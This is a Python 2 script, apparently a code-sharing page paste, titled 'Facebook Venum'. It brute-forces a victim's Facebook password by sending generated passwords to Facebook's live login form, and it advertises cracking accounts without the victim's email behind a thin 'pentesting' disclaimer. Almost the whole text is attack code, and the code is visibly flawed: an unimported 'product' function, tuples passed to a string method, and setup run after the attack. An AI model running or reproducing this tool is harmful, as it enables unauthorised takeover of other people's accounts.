1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109
| #!usr/bin/python
import random
import sys
import mechanize
import cookielib
GHT = '''
+=======================================+
|..........Facebook Venum...............|
+---------------------------------------+
|#Author: Nicolas Contamine |
| |
|#Date: 18/12/2015 |
|#This tool is made for pentesting. |
| |
| |
| |
|""I do not take any responsibilities |
| for the usage of this program"" |
+=======================================+
|..........Facebook Venum...............|
+---------------------------------------+
'''
print "Note: - This tool can crack facebook account even if you don't have the email of your victim"
print "# Hit CTRL+C to quit the program"
print "# No wordlist needed"
print "# This script use an integrated alphanumeric all randoms wordlist with lower and upper case letters and digits from 6 to 15 range for an exact total of 853058370935030464 randoms"
email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))
useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
login = 'https://www.facebook.com/login.php?login_attempt=1'
def attack(password):
try:
sys.stdout.write("\r[*] trying %s " % password)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(useragents))]
site = br.open(login)
br.select_form(nr=0)
##Facebook
br.form['email'] = email
br.form['pass'] = password
br.submit()
log = br.geturl()
if log != login:
print "\n\n\n[*] Password found .. !!"
print "\n[*] Password : %s\n" % (password)
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program .. "
sys.exit(1)
def search():
global password
for password in get_pass(16):
attack(password.replace("\n",""))
def check():
global br
global passwords
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
except KeyboardInterrupt:
print "\n[*] Exiting program ..\n"
sys.exit(1)
def get_pass(n):
for i in range(n):
for perm in product("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
repeat=i):
yield perm
try:
print GHT
print "[*] Account to crack : %s" % (email)
print "[*] Cracking, please wait ..."
except KeyboardInterrupt:
print "\n[*] Exiting program ..\n"
sys.exit(1)
try:
search()
attack(password)
except KeyboardInterrupt:
print "\n[*] Exiting program ..\n"
sys.exit(1)
if __name__ == '__main__':
check() |
Partager